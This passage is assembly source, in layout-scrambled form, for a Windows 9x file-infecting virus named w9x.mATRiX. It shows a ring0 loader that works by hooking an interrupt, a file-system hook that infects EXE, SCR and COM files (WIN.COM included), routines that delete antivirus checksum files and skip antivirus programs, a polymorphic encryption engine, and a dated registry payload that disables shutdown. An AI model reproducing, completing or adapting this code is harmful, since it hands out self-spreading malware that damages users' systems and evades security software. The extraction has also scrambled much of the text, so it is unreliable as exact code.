0148h 0152h 80000001h 4

;used by payload for registery ;modifying ; ;

debug_beep_FREQ

equ

1700

;for debugging

debug_beep_DELAY

equ

50*65536

debug_beep_FREQ2 debug_beep_DELAY2

equ equ

700 100*65536

;for debugging

;----- -[Macro's]- ----------------------------------------------------------; VxDCall macro int dw dw endm

vxd_id, service_id 20h service_id vxd_id

VMMCall macro int dw dw endm

service_id 20h service_id 0001h

;Is just less work than doing ;a VxDCall VMM, service

if debug eq 1 ; display "Debug Version" else display " °±²Û *Warning* This is the real version of the virus Û²±°" endif ;----- -[Code]- -------------------------------------------------------------; _CODE segment dword use32 public 'CODE' start: pushad call getdelta: pop sub

newEIP

getdelta ebp ebp,offset getdelta

sub equ

eax,00001000h $-4

mov

dword ptr [imagebase+ebp],eax

;Get imagebase at runtime

pushad call

setupSEHandKillEmu

;The call pushes the offset

mov

esp,[esp+8]

;Error gives us old

jmp

backtocode

ESP

setupSEHandKillEmu: xor edx,edx push dword ptr fs:[edx] mov fs:[edx],esp dec byte ptr cs:[edx]

;fs:[edx] = smaller then fs:[0] ;Push original SEH handler ;And put the new one (located ;make error & let our SEH take ;control (not nice 4 emu's:)

backtocode: pop pop

dword ptr fs:[0] edx

;pops EIP pushed by call setupSEH

SetupSEH

;to kill errors

popad call

;if eip gets here an error has occured mov

esp,[esp+8]

;contains old ESP

jmp

RestoreSEH

;...

edx,edx dword ptr fs:[edx] fs:[edx],esp

;we are save now, if an error ;occure EIP will be at the ;code after SetupSEH

SetupSEH: xor push mov push sidt pop

edx fword ptr [esp-2] edx

add

edx,(inthook*8)+4

mov mov

ebx,dword ptr [edx] bx,word ptr [edx-4]

lea

edi,dword ptr [ebp+Inthandler]

;routine to let int point to

mov shr mov

word ptr [edx-4],di edi,16 word ptr [edx+2],di

;high/low word

int

inthook

;call int, int will be ring0!

mov shr mov

word ptr [edx-4],bx ebx,16 word ptr [edx+2],bx

;Restore old interrupt values

;'push' int table ;restore stack from call and ;edx contains pointer to IDT ;Get int vector

RestoreSEH: xor pop pop

edx,edx dword ptr fs:[edx] edx

mov add

edi,dword ptr [imagebase+ebp] edi,dword ptr [base+ebp]

lea mov rep

esi,[offset oldbytes+ebp] ecx,JmpToCodesz movsb

;pops offset pushed by CALL ;--- Restore old bytes ---; ;do at it ring0 to avoid ;page errorz

;restore bytes from host

popad mov imagebase add base equ push ret

eax,00h equ $-4 eax,offset host -0400000h $-4

;--- return to host ---; ;1st gen

eax

;----------------------------------------------------------------------------; ; **** RING0 LOADER **** ;----------------------------------------------------------------------------; Inthandler: pushad

VxD1V VxD1:

rep

VxD2V VxD2:

VxD5V VxD5:

mov cmp je mov

eax,0bff70404h dword ptr [eax],eax back2ring3 dword ptr [eax],eax

push xor push push push push push push push equ VMMCall add

PAGEFIXED + PAGEZEROINIT eax, eax eax eax eax eax eax PG_SYS SizeInPages*2 00010053h PageAllocate esp, 8*4

or jz

eax,eax back2ring3

;eax = place in mem ;if zero error :(

mov

edi,eax

;set (e)destination

push

eax

push lea mov cld movsb pop

edi esi,[offset start+ebp] ecx,virusz

mov

dword ptr [edi+delta-start],edi

lea push equ VxDCall pop

ecx,[edi+offset hook-offset start] ecx InstallFileSystemApiHook+256*256*IFSMgr IFSMgr,InstallFileSystemApiHook ecx

mov

[edi+nexthook-start],eax

pop

eax

push push push shr push equ VMMCall add

PC_STATIC 020060000h SizeInPages*2 eax, 12 eax 00010133h PageModifyPermissions esp, 4*4

call

CheckThePayloadDate

if debug eq 1 call endif back2ring3:

;already loaded?

;PhysAddr ;maxPhys ;minPhys ;Align ;handle of VM = 0 if PG_SYS ;allocate memory in system area ;nPages

;set source ;virussize ;you never know with poly :) ;copy virus to allocated mem

edi

debug_beep2

;Install FileSystem Hook

;new paging settings

;(and mayB do something:)

if debug eq 1 call endif

debug_beep

popad iretd ;exit int (to ring3!) ;----------------------------------------------------------------------------; host: oldbytes: Push Call db

0 ExitProcess JmpToCodesz-5 dup (176d)

;----------------------------------------------------------------------------; ; **** FILESYSTEM HOOK **** ;----------------------------------------------------------------------------; hook: push ebp mov ebp,esp sub esp,20h push push push

delta

ebx esi edi db dd

0bfh 0

cmp je

dword ptr [busy-start+edi],not "BuSY" back

if debug eq 1 cmp je endif

;mov edi,DeltaInMem

;...are we busy?

dword ptr [death-start+edi],'TRUE' back

mov not

eax,dword ptr [ebp+0Ch] eax

;EAX = Function

cmp jz

eax,not IFSFN_OPEN infect

;File Open? try it

cmp jz

eax,not IFSFN_RENAME infect

;Rename? try it

cmp jz

eax,not IFSFN_FILEATTRIB infect

;File Attributes? try it

back: mov eax,[ebp+28] push eax mov eax,[ebp+24] push eax mov eax,[ebp+20] push eax mov eax,[ebp+16] push eax mov eax,[ebp+12] push eax mov eax,[ebp+8]

; call the old

push

eax

db 0b8h nexthook dd 0 call [eax] add esp,6*4 pop edi pop esi pop ebx leave ret ;----------------------------------------------------------------------------; ; **** SOME CHECKS BEFORE INFECTING **** ;----------------------------------------------------------------------------; infect: pushad if debug eq 1 mov mov or jz

eax,0bff70400h eax,dword ptr [eax] eax,eax stayalive

;kill ourself?

mov

dword ptr [edi+death-start],'TRUE'

call call call call call

debug_beep debug_beep2 debug_beep2 debug_beep2 debug_beep

mov

eax,0bff70400h

xor mov mov

edx,edx dword ptr [eax],edx dword ptr [eax+4],edx

stayalive: endif mov

dword ptr [busy-start+edi],not 'BuSY'

lea

esi, [edi+filename-start]

mov cmp je add mov mov add

eax, dword ptr [ebp+16] al,0ffh nopath al,40h byte ptr [esi],al word ptr [esi+1],':' esi,2

xor push inc push mov

eax,eax eax ;push 0 ah eax ;push 100h eax,[ebp+28]

;file buffer

;no drive defined? ;a=1,b=2,a+40h='A',b+40h='B'

nopath: ;BCS/WANSI ;ax=100h ;buf size

mov add push push VxD3V VxD3:

eax,[eax+12] eax,4 eax esi

;filename ;destination (buffer)

equ UniToBCSPath+256*256*IFSMgr VxDCall IFSMgr, UniToBCSPath

;Convert to ASCII

add add mov

esp,4*4 esi,eax byte ptr [esi],0

;restore stack ;eax = lenght ;make ASCIIZ

mov

eax,dword ptr [esi-4]

not cmp je

eax eax,not 'EXE.' infectit

; ;normal exe?

cmp je

eax,not 'RCS.' infectit

;screensaver?

eax,not 'MOC.' nocomfile payloadinfector

;a com? (indeed !!:)

mov popad

dword ptr [busy-start+edi],eax

;hope eax <> 'busy' :)

jmp

back

cmp jne jmp nocomfile: quitinfect:

db db db db db counter db db db db

"<w9x.mATRiX." virusz/1000 mod 10+'0' virusz/0100 mod 10+'0' virusz/0010 mod 10+'0' virusz/0001 mod 10+'0',"." db "0001086 & MyLittlePoly." polysz/1000 mod 10+'0' polysz/0100 mod 10+'0' polysz/0010 mod 10+'0' polysz/0001 mod 10+'0'

;enough space for counter :)

if debug eq 1 db " Debug Version" endif db

" by LiFEwiRE [sHAD0WvX]>"

dontinfect: pop pop pop call jmp

;when attrs. were already modified esi ;get attribs + 1 = set ecx ;old attrs eax ;pointer to buffer with filen. R0_FileIO ;RESTORE ATTRIBUTES quitinfect

cryptkey cryptkey2

dd dw

0 0

;----------------------------------------------------------------------------; ; **** REAL PE INFECTION PART **** ;----------------------------------------------------------------------------; infectit: lea

esi, [edi+filename-start]

call jc

checkname quitinfect

if debug eq 1 cmp jne endif

;if name = bad

word ptr [esi],":D" quitinfect

mov push call

eax,R0_FILEATTRIBUTES + GET_ATTRIBUTES eax R0_FileIO

pop inc push push push xor call

eax eax eax ecx esi ecx,ecx R0_FileIO

xor mov inc mov inc mov call jc

ecx,ecx edx,ecx edx ebx,edx ebx eax,R0_OPENCREATFILE R0_FileIO dontinfect

;ecx=0 ; ;edx=1 ; ;ebx=2

mov

ebx,eax

;file handle

lea mov mov mov call

esi,[edi+pointertope-start] ecx,4 edx,03ch eax,R0_READFILE R0_FileIO

;read pointer to PE at 3ch ;into pointertope

lea mov mov mov call

esi,[edi+peheader-start] ;peheader buffer ecx,1024 ;1024 bytes edx,dword ptr [edi+pointertope-start] ;pointer to pe header eax,R0_READFILE ;... R0_FileIO

cmp jne

word ptr [esi],'EP' nope

;is pe? ;nope, its noPE :)

mov cmp je mov

eax,0badc0deh dword ptr [esi+4ch],eax nope dword ptr [esi+4ch],eax

;already infected? ;4ch = reserved

push push push

ebp edi ebx

;eax=4300+1 = set ;save attribs ;and esi,no new LEA needed ;new attr

;save handle for after calcs.

mov

ebp,edi

mov add add

edi,esi esi,18h si,word ptr [esi+14h-18h]

;esi+18h=start of OptionalHeader ;esi-4 = pe/0/0+14h = size OH ;optionalheader+size=allocation table

;edi = PE/0/0, esi = allocation table push xor mov xor push sectionsearch: cmp jb mov mov lower: add loop pop

;put in ecx nr. of sections ;startvalue of eax ;

dword ptr [esi+14h],eax lower ebx,ecx eax,dword ptr [esi+14h]

;is it the highest? ;no ;remember section nr. ;and remember value

esi,28h sectionsearch cx

;steps of 28h

sub

ecx,ebx

mov mul pop add

eax,28h ecx esi esi,eax

; Section ; ;esi+0h ; 8h ; 0ch ; 10h ; 14h ; 18h ; 1ch ; 20h ; 22h ; 24h

;

esi ecx,ecx cx,word ptr [edi+6] eax,eax cx

;multiply with section length

;esi points now to section header

header layout, Tdump names things other (4 example rawdata) 8h 4h 4h 4h 4h 4h 4h 2h 2h 4h

Section's name (.reloc, .idata, .LiFEwiRE) VirtualSize RelativeVirtualAdress SizeOfRawData PointerToRawData PointerToRelocations PointerToLinenumbers NumberOfRelocations NumberOfLinenumbers Characteristics

ESI points to Section header, EDI points to PE or

[esi+24h],sectionflags

; Update section's flagz

mov mov add add push

edx,[esi+10h] eax,edx edx,[esi+0Ch] eax,[esi+14h] eax

; ; ; ; ;

push

esi

add mov

eax,[esi+0Ch] [edi+50h],eax

mov mov mov

eax,[edi+28h] dword ptr [ebp+base-start],eax dword ptr [ebp+newEIP-start],edx

EDX = SizeOfRawData EAX = SizeOfRawData EDX = New EIP EAX = Where append virus Save it

;backup entry RVA ;... ;save it

add

edx,dword ptr [edi+34h]

;edx=neweip+imagebase

mov

dword ptr [ebp+distance-start],edx

mov add add

esi,edi esi,18h si,word ptr [esi+14h-18h]

; Store the address

;esi+18h=start of OptionalHeader ;esi-4 = pe/0/0+14h = size OH

;ESI points to the allocation table,EDI to PE ;lets find the section which contains the RVA. ;then the place where to put the jump is entry-rva+phys.

look:

sub

esi,28h

add mov sub cmp jae

esi,28h edx,eax edx,dword ptr [esi+0Ch] edx,dword ptr [esi+08h] look

sub add

eax,dword ptr [esi+0ch] eax,dword ptr [esi+14h]

;sub RVA ;add PhysicalOffset ;EAX is now the PhysicalOffset ;of the EntryPoint

or

[esi+24h],sectionflags

; Update section's flagz

pop pop pop

esi edx ebx

push push push

edx esi eax

;

lea mov mov mov call

esi,[ebp+oldbytes-start] ecx,JmpToCodesz edx,eax eax,R0_READFILE R0_FileIO

;read pointer to PE at 3ch ;into pointertope

mov

word ptr [ebp+randombla-start],ax

pop lea mov mov call

edx esi,[ebp+JmpToCode-start] eax,R0_WRITEFILE ecx,JmpToCodesz R0_FileIO

;and write new bytes at entry ;point to make code jmp to ;the section which contains ;the viruscode (modifying the ;entry RVA will alert AV's)

call

VxDPatch

;unpatch VxDCalls (and VMM)

call

IncCounter

;a ASCII counter rules

call

encrypt

;encrypt,createpoly,returnsize (in ecx)

;Old EntryPoint (RVA) ;VirtualAddres ;VirtualSize

;random value

;encrypt-^ returns the virus size in ecx mov mov

eax,ecx ecx,[edi+3Ch]

;ECX = Alignment

push xor push div pop sub add pop mov

edx edx,edx eax ecx eax ecx,edx eax,ecx edx ecx,eax

; Align

pop

esi

add mov add

[esi+10h],eax eax,[esi+10h] [esi+08h],eax

; Size of rawdata ; ; & virtual size

pop push lea mov push call

edx edi esi,[ebp+viruscopy-start] eax,R0_WRITEFILE eax R0_FileIO

;polymorfer returns size in ;the ECX register

pop pop mov mov call

eax esi ecx,1024 edx,[ebp+pointertope-start] R0_FileIO

pop pop

edi ebp

mov call

eax,R0_CLOSEFILE R0_FileIO

;aligned size to append

;append virus

;overwrite PE header

nope:

if debug eq 1 call endif

debug_beep

call call

killAVfiles infectwindotcom

jmp

dontinfect

;for payload

windotcom sizewdc

db equ

"C:\WINDOWS\WIN.COM",0h $-offset windotcom

avpcrc antivirdat ivbntz chklistms

db db db db

9,"AVP.CRC",0h 14,"ANTI-VIR.DAT",0h 9,"IVB.NTZ",0h 12,"CHKLIST.MS",0h

;for payload

killAVfiles: pushad ;first add the path to the filename

killing:

mov

ebp,edi

lea

edx,[offset avpcrc-start+ebp]

mov

ecx,4

call xor mov add loop

killthisfile ebx,ebx bl,byte ptr [edx] edx,ebx killing

popad ret

killthisfile: pushad lea push mov cld scasb jne std mov scasb jne

edi,[offset filename-start+ebp] edi al,'.' ;search from left to right for the dot $-1

al,'\'

;search from right to left for the \

$-1

xor

ecx,ecx

inc inc

edi edi

;edi pointed to char before \ ;edi pointed to \

cld

rep

mov lodsb mov movsb

esi,edx

pop mov mov call popad ret

esi eax,R0_DELETEFILE ecx,2027h R0_FileIO

cl,al

;-------------------------------------------------------------------------; **** MODIFIES COM FILES FOR PAYLOAD, SPECIAL FOR WIN.COM *** ;-------------------------------------------------------------------------infectwindotcomflag

db

0h

infectwindotcom: ;called if virus is not resident pushad mov byte ptr [edi+offset infectwindotcomflag-start],'!'

rep

push

edi

lea lea mov cld movsb

esi,[offset windotcom-start+edi] edi,[offset filename-start+edi] ecx,sizewdc

pop

edi

jmp

payloadinfector

backfrominfecting: mov popad ret

byte ptr [edi+offset infectwindotcomflag-start],173d ;-

;-------------------------------------------------------------------------jmpop jmpval

dw dw

0e990h ?

;nop & jmp

;-------------------------------------------------------------------------payloadinfector: if debug eq 1 cmp dword ptr [esi-8],'PRUB' jne wegvancom endif

;*BURP.COM ?

lea

esi, [edi+filename-start]

xor mov inc mov inc mov call jc

ecx,ecx edx,ecx edx ebx,edx ebx eax,R0_OPENCREATFILE R0_FileIO wegvancom

;ecx=0 ; ;edx=1 ; ;ebx=2

mov

ebx,eax

;file handle

lea mov xor mov call

esi,[edi+first4bts-start] ecx,4 edx,edx eax,R0_READFILE R0_FileIO

;read first 4 bytes

cmp je

word ptr [edi+first4bts-start],'ZM' closecomfile

;a renamed EXE ??

cmp je

word ptr [edi+first4bts-start],0e990h closecomfile

;already infected?

mov call

eax,R0_GETFILESIZE R0_FileIO

cmp ja

eax,0ffffh-0100h-dospayloadsize ;infectable? closecomfile

push

eax

sub mov

eax,4 word ptr [edi+jmpval-start],ax

lea mov mov

esi,[edi+offset jmpop-start] eax,R0_WRITEFILE ecx,4

;get it's size

;distance to jmp ;Write new jMP at 0h

xor push call

edx,edx eax R0_FileIO

pop pop push lea mov call

eax edx ;place to append edx esi,[edi+offset dospayload-start] ecx,dospayloadsize R0_FileIO

pop push sub mov mov lea call

edx ;read 7 bytes before the end edx edx,7 ecx,7 eax,R0_READFILE esi,[edi+offset filename-start] ;just a buffer R0_FileIO

pop

edx

cmp jne

word ptr [edi+offset filename-start+3],'SN' ;ENUNS? (ENU is closecomfile ;optional)

add

word ptr [edi+offset filename-start+5],dospayloadsize+7

mov

ecx,7

lea mov add call

esi,[edi+offset filename-start] eax,R0_WRITEFILE edx,dospayloadsize R0_FileIO ;append updated ENUNS

closecomfile: mov call

eax,R0_CLOSEFILE R0_FileIO

wegvancom: if debug eq 1 call endif

debug_beep

cmp je

byte ptr [edi+offset infectwindotcomflag-start],'!' backfrominfecting

jmp

quitinfect

;--------------------------------------------------------------------------

;-------------------------------------------------------------------------; *** BEEPS used if debug equ 1 *** ;--------------------------------------------------------------------------

if debug eq 1 debug_beep: push push mov

eax ecx eax,0bff70408h

cmp jne

byte ptr [eax],0 geenirritantgebiepvandaag

mov out

al, 0B6h 43h, al

mov out mov out

al, (12345678h/debug_beep_FREQ) and 255 42h, al al, ((12345678h/debug_beep_FREQ) shr 16) and 255 42h, al

in or out

al, 61h al, 3 61h, al

mov loop

ecx, debug_beep_DELAY $

in and out

al, 61h al, not 3 61h, al

pop pop ret

ecx eax

debug_beep2: push push

eax ecx

mov out

al, 0B6h 43h, al

mov out mov out

al, (12345678h/debug_beep_FREQ2) and 255 42h, al al, ((12345678h/debug_beep_FREQ2) shr 16) and 255 42h, al

in or out

al, 61h al, 3 61h, al

mov loop

ecx, debug_beep_DELAY2 $

in and out

al, 61h al, not 3 61h, al

geenirritantgebiepvandaag: pop pop ret

;blaa dit versta jij toch niet looser :P

ecx eax

endif

;-------------------------------------------------------------------------; File IO function, called lot of times, better for patching callback ;-------------------------------------------------------------------------R0_FileIO: VxD4V equ

Ring0_FileIO+256*256*IFSMgr

VxD4:

VxDCall IFSMgr, Ring0_FileIO ret

;--------------------------------------------------------------------------

;-------------------------------------------------------------------------; Increases the ASCII counter of infections ;-------------------------------------------------------------------------IncCounter: lea

;counts a ASCII counter... when there are more than ;9999999 files infected it contains a bug, but i don't esi,[offset counter-start+6+ebp] ;expect that from this vir :)

inc cmp jb mov dec jmp

byte ptr [esi] byte ptr [esi],'9'+1 ok byte ptr [esi],'0' esi next

next:

ok: ret

;-------------------------------------------------------------------------;-----------------------------------------------------------------------------; Some things used in the registery payload ;-----------------------------------------------------------------------------KeyOfPolicies valuename1 ValueToSet

db db dd

"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0h "NoClose",0h ;no shutdown :) 1h

CheckThePayloadDate:

VxD6V VxD6:

mov out in

al,07h 70h,al al,71h

;Get day ;(returns it in hex btw!)

cmp jnz

al,06h noPayload

;Is it 6th?

mov out in

al,08h 70h,al al,71h

;Get month ;(returns it in hex btw!)

cmp jnz

al,04h noPayload

;Is it 4th? ;(

lea push lea push push equ VMMCall

eax,[offset pointertope+ebp] eax eax,[offset KeyOfPolicies+ebp] eax HKEY_CURRENT_USER RegOpenKey+256*256*1 RegOpenKey

;just a buffer

add

esp,3*4

;reset stackpointer

;open this key ;

VxD7V VxD7:

push lea push push push lea push push equ VMMCall

4 eax,[offset ValueToSet+ebp] eax REG_DWORD 0 eax,[offset valuename1+ebp] eax [pointertope+ebp] RegSetValueEx+256*256*1 RegSetValueEx

add

esp,6*4

;length of value ;set value true ;type ;reserved

;handle ;1 = VMM

noPayload: ret

;--------------------------------------------------------------------------

;-------------------------------------------------------------------------; Patches the VxDCalls (on execute windows modifies them to a real call) ;-------------------------------------------------------------------------VxDPatch: pushad mov

bx,020cdh

;int 20 used by VxDCall

mov mov

word ptr [VxD1-start+ebp],bx dword ptr [VxD1-start+ebp+2],VxD1V

mov mov

word ptr [VxD2-start+ebp],bx dword ptr [VxD2-start+ebp+2],VxD2V

mov mov

word ptr [VxD3-start+ebp],bx dword ptr [VxD3-start+ebp+2],VxD3V

mov mov

word ptr [VxD4-start+ebp],bx dword ptr [VxD4-start+ebp+2],VxD4V

mov mov

word ptr [VxD5-start+ebp],bx dword ptr [VxD5-start+ebp+2],VxD5V

mov mov

word ptr [VxD6-start+ebp],bx dword ptr [VxD6-start+ebp+2],VxD6V

mov mov

word ptr [VxD7-start+ebp],bx dword ptr [VxD7-start+ebp+2],VxD7V

;int 20 ;dd with IFSMGR & fn.

popad ret ;--------------------------------------------------------------------------

rnd32_seed

dd

0h

;------ this code is putted at EIP of host and jmps to virus code -----------; JmpToCode: stc db 066h,0fh,083h ;jnc randombla dw ? ;some place

mov distance

eax,12345678h equ $-4 eax

push ret EndJmpToCode: ;----------------------------------------------------------------------------; ;this sweet code will be appended to .com files (234 / 0eah bytes large) dospayload db db db db db db db db db db db db db db db db db db db first4bts dospayloadsize

label byte 0e8h,09h,00h,0ebh,012h,08bh,0ech,083h,0c4h,020h,0ebh,04h,0ebh 0fch,0cdh,021h,0e8h,02ch,00h,0ebh,0eeh,0e2h,0f9h,058h,08bh 0ech,02dh,03h,01h,0fbh,095h,0b4h,04ch,080h,0ech,022h,0cdh,021h 080h,0feh,07h,075h,05h,080h,0fah,07h,074h,017h,0beh,0eah,01h 03h,0f5h,0bfh,00h,01h,0a5h,0a5h,0b8h,00h,01h,050h,0c3h,0ebh 05h,0b8h,00h,04ch,0cdh,021h,0c3h,0beh,058h,01h,03h,0f5h,08bh 0feh,0b9h,092h,00h,0fch,0ach,0f6h,0d8h,0aah,0e2h,0fah,018h 07dh,00h,098h,00h,048h,0f9h,047h,0f6h,00h,018h,08dh,00h,042h 070h,0ffh,0fdh,0bh,018h,0a8h,00h,018h,0abh,00h,047h,0d4h,0ffh 018h,09eh,00h,018h,0b4h,00h,06h,015h,02h,0a0h,04ch,0d4h,033h 0dfh,076h,026h,04ch,0d4h,033h,0dfh,0d6h,02dh,080h,06h,0ech 08eh,0bh,09fh,03dh,0a9h,09fh,095h,09bh,0e0h,08bh,090h,0d4h 0e0h,0b2h,09bh,091h,0d2h,0d2h,0d2h,00h,0ach,098h,09bh,0e0h 0b3h,09fh,08ch,08eh,097h,088h,0e0h,098h,09fh,08dh,0e0h,087h 091h,08bh,0d2h,0d2h,0d2h,00h,089h,0c7h,088h,0d2h,093h,0bfh 0ach,0aeh,097h,0a8h,0e0h,0adh,0aah,0a8h,00h,018h,0eah,00h,0cdh 01h,04ch,0f6h,054h,055h,018h,055h,01h,0f6h,040h,08bh,09h,047h 0e2h,00h,018h,05fh,01h,01eh,05h,03dh,048h,0fdh,00h,033h,0f0h 04ch,0ffh,04bh,0e0h,033h,0f0h,03dh dd ? ;the first 4 overwritten bytes from the host equ $-offset dospayload

badnames

label byte 04h,"_AVP" 03h,"NAV" 02h,"TB" 02h,"F-" 03h,"PAV" 03h,"DRW" 04h,"DSAV" 03h,"NOD" 03h,"SCA" 05h,"NUKEN" 04h,"YAPS" 03h,"HL." 04h,"MIRC" 0h

db db db db db db db db db db db db db db

;_AVP files ;Norton AV ;Tbscan, Tbav32, whole shit ;F-Prot ;Panda AV ;Doc. Web ;Doc. Salomon ;NodIce ;SCAN ;Nukenabber? (error with infecting) ;YetAnotherPortScanner (selfcheck) ;HalfLife (thx to Ghostie!) ;mIRC = strange

;-------------------------------------------------------------------------; * Checks the name of the file to be infected ;-------------------------------------------------------------------------checkname: pushad

;check for some bad names

mov mov

ebp,edi edi,esi

mov cld scasb jne

al,'.'

;delta ;points to filename

;search from left to right for the dot $-1

std mov scasb jne inc inc

al,'\'

;search from right to left for the \

$-1 edi edi

;edi pointed to char before \ ;edi pointed to \

cld lea checkname2: xor lodsb or jz mov push rep cmpsb pop jz add jmp

esi,[offset badnames+ebp-start]

eax,eax al,al didit ecx,eax edi

;for load AL ;size of string in al

;counter for bytes ;save pointer to filename ;compare stringbyte

edi ArghItIsAshitFile esi,ecx checkname2

ArghItIsAshitFile: popad stc ret didit: popad clc ret ;--------------------------------------------------------------------------

;-------------------------------------------------------------------------; *** POLYMORFIC engine which generates decrypter & encrypts code *** ;--------------------------------------------------------------------------

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

The generated code will look like this: pushad lea RegUsedAsPointer,[eax+placewherecryptedcodestarts] mov keyregister,randomvalue sub keyregister,randomvalue mov counterreg,size again: mov tempregister,[RegUsedAsPointer] xor tempregister,keyregister mov [RegUsedAsPointer],tempregister add RegUsedAsPointer,4 dec counterreg pushf popf jz exit jmp again exit:

between each instruction some random code is putted.

polysz equ encrypt: push push push push push

offset polyend - offset encrypt eax ebx edx esi edi

lea

edi,[offset viruscopy+ebp-start]

call

gengarbage

;--------PUSHAD-mov al,60h stosb ;--------MOV----call

;edi points to buffer

;pushad

gengarbage

getregforoffset: ;This reg will contain the offset of code call getrndal cmp al,4 ;do not use ESP je getregforoffset cmp al,5 ;do not use EBP (!) je getregforoffset mov

ch,al

;--LEA reg,[EAX+x]shl al,3 mov ah,08dh xchg ah,al add ah,080h push edi stosw stosd ;------------------

call

getregforkey: call cmp je cmp je cmp je

;backup register for offset code

;lea

;save location for patch ;doesn't matter what we store

gengarbage

;This reg will contain the crypt key getrndal al,4 getregforkey al,1 getregforkey al,ch getregforkey

mov

cl,al

call

gengarbage

;--------MOV----add al,0b8h stosb call get_rnd32 stosd

;do not use ESP ;do not use ECX

;backup register

;make a MOV reg, rndvalue

;---------------mov mov

ebx,eax ah,cl

call

gengarbage

;--------SUB----mov al,081h add ah,0e8h stosw call get_rnd32 stosd ;----------------

sub

getregforsize: call cmp je cmp je cmp je

;backup key ;register back in ah

;make a SUB reg, rndvalue

ebx,eax

getrndal al,4 getregforsize al,cl getregforsize al,ch getregforsize

mov

dh,al

call

gengarbage

;----MOVSIZE----add al,0b8h stosb mov eax,virusz/4 stosd ;----------------

;Save the cryptkey

;do not use ESP ;nor keyreg ;nor offsetreg

;mov ecx,virussize (size to decrypt)

;***

AT THIS POINT IS EDI THE OFFSET FOR THE JMP

mov

esi,edi

;8b + 00, eax=3,[eax=0]

getregtoxor: call cmp je cmp je cmp je cmp je

mov

***

ch = reg2

;This reg will contain crypted code and'll be xored getrndal al,4 ;do not use ESP getregtoxor al,cl getregtoxor ;do not use the keyreg al,ch getregtoxor ;do not use the offset reg al,dh getregtoxor

dl,al

call

gengarbage

;-MOV REG3,[REG2] shl al,3 or al,ch mov ah,08bh xchg al,ah stosw ;----------------

call

gengarbage

;-XOR REG3,REG1-mov al,dl shl al,3 or al,cl add al,0c0h mov ah,33h xchg al,ah stosw ;----------------

call

gengarbage

mov

al,dl

;-MOV [REG2],REG3 shl al,3 or al,ch mov ah,089h xchg al,ah stosw ;----------------

call

;make a xor reg3,reg1 reg1=key

;make a mov [reg2],reg3 reg2=offset code

gengarbage

;-ADD REG2,4----mov al,83h stosb mov ax,004c0h add al,ch stosw ;----------------

call

;make a mov reg3,[reg2] reg2=offset code

;adds 4 to the offset register

gengarbage

;---DEC REG4----mov al,dh add al,048h stosb ;----------------

;decreases counter reg4 (size)

mov

;pushf

eax,9c66h

stosw

call

gengarbage

inc stosw

ah

;popf

;---JZ OVER-----mov ax,074h stosw push edi ;----------------

mov regenerate: mov

eax,edi edi,eax

call

gengarbage

mov sub cmp ja

edx,edi edx,eax edx,080h-5 regenerate

;can't generate > 80h-5 bytes of garbage ;between JZ beh - poly - JMP - beh: code... ;restore EDI for ja

;80h = max JZ distance, 5 is size of JMP BACK

;----JMP BACK---sub esi,edi mov al,0e9h stosb mov eax,0fffffffbh add eax,esi stosd ;----------------

;----PATCH JZ---pop esi mov sub mov

;esi-1 = jz value

eax,edi eax,esi byte ptr [esi-1],al

;---------------call

gengarbage

;----POPAD------mov al,61h stosb ;----------------

call

;popad

gengarbage

;----PATCH LEA--pop esi push edi

;patch LEA reg1,[EAX+startofcrypted]

sub edi,offset viruscopy-start sub edi,ebp mov dword ptr [esi+2],edi pop edi ;----------------

mov mov

ecx,virusz/4 esi,ebp

;copy encrypted virus code after poly ;decryptors

cryptit: lodsd xor stosd loop

eax,ebx cryptit

sub sub mov

edi,offset viruscopy-start edi,ebp ecx,edi

pop pop pop pop pop ret

edi esi edx ebx eax

;virus size + poly in ECX

;----------------------------------------------------------------------------; ; Generates lot of rnd instructions which look good but do nothing ; (they undo themself indirect) ;----------------------------------------------------------------------------; gengarbage: push push push push push

eax ebx ecx edx esi

garbageloop: call

get_rnd32

and

al,1111b

cmp je

al,1 genadd

;OK

cmp je

al,2 gensub

;OK

cmp je

al,3 genxor

;OK

cmp je

al,4 genmov

;OK

cmp je

al,5 genpush

;OK

cmp je

al,6 geninc

;OK

cmp je

al,7 gendec

;OK

cmp je

al,8 gencmp

;OK

cmp je

al,9 genjunk

;OK

cmp jb

al,0eh garbageloop

pop pop pop pop pop

esi edx ecx ebx eax

exitgen:

ret ;----------------------------------------------------------------------------; Generates random add ;----------------------------------------------------------------------------genadd: call getrndal cmp je

al,4 genadd

;4 = esp, leave him alone

cmp jb

ah,80h addandsub

;generate an add - code - sub

and

eax,111b

cmp ja

byte ptr [ebp+offset pushtable+eax-start],0h savetoadd ;yep

call

pushregister

call

gengarbage

call

randomadd

call

gengarbage

call

popregister

jmp

exitgen

savetoadd: call jmp addandsub: push xchg mov add

randomadd exitgen

eax al,ah al,081h ah,0c0h

;is the reg. pushed?

;adds a value or register

stosw push

eax

call stosd push

get_rnd32

call

gengarbage

pop pop

ebx eax

add stosw mov stosd

ah,028h

eax

eax,ebx

pop eax jmp exitgen ;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates random sub ;----------------------------------------------------------------------------gensub: call getrndal cmp je

al,4 gensub

;4 = esp, leave him alone

cmp jb

ah,80h subandadd

;generate an add - code - sub

and

eax,111b

cmp ja

byte ptr [ebp+offset pushtable+eax-start],0h savetosub ;yep

call

pushregister

call

gengarbage

call

randomsub

call

gengarbage

call

popregister

jmp

exitgen

savetosub: call

randomsub

jmp

exitgen

subandadd: push

eax

xchg mov add

al,ah al,081h ah,0e8h

;is the reg. pushed?

;adds a value or register

stosw push

eax

call stosd push

get_rnd32

call

gengarbage

pop pop

ebx eax

sub stosw mov stosd

ah,028h

pop

eax

eax

eax,ebx

jmp exitgen ;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates random xor ;----------------------------------------------------------------------------genxor: call getrndal cmp je

al,4 genxor

cmp jb

ah,80h genxorxor

and

eax,111b

cmp ja

byte ptr [ebp+offset pushtable+eax-start],0h savetoxor ;yep

call

pushregister

;first push

call

gengarbage

;generate some garbage

call

randomxor

;xors with a value or register

call

gengarbage

;generate some garbage

call

popregister

;and pop it

jmp

exitgen

savetoxor: call

randomxor

jmp

exitgen

genxorxor: push xchg add

eax al,ah ah,0f0h

;generate an xor - code - xor

;is the reg. pushed?

mov

al,081h

stosw push

eax

call stosd push

get_rnd32

call

gengarbage

pop pop

ebx eax

eax

stosw mov

eax,ebx

stosd pop jmp

eax exitgen

;----------------------------------------------------------------------------;----------------------------------------------------------------------------; Generates random mov ;----------------------------------------------------------------------------genmov: call getrndal cmp je

al,4 genmov

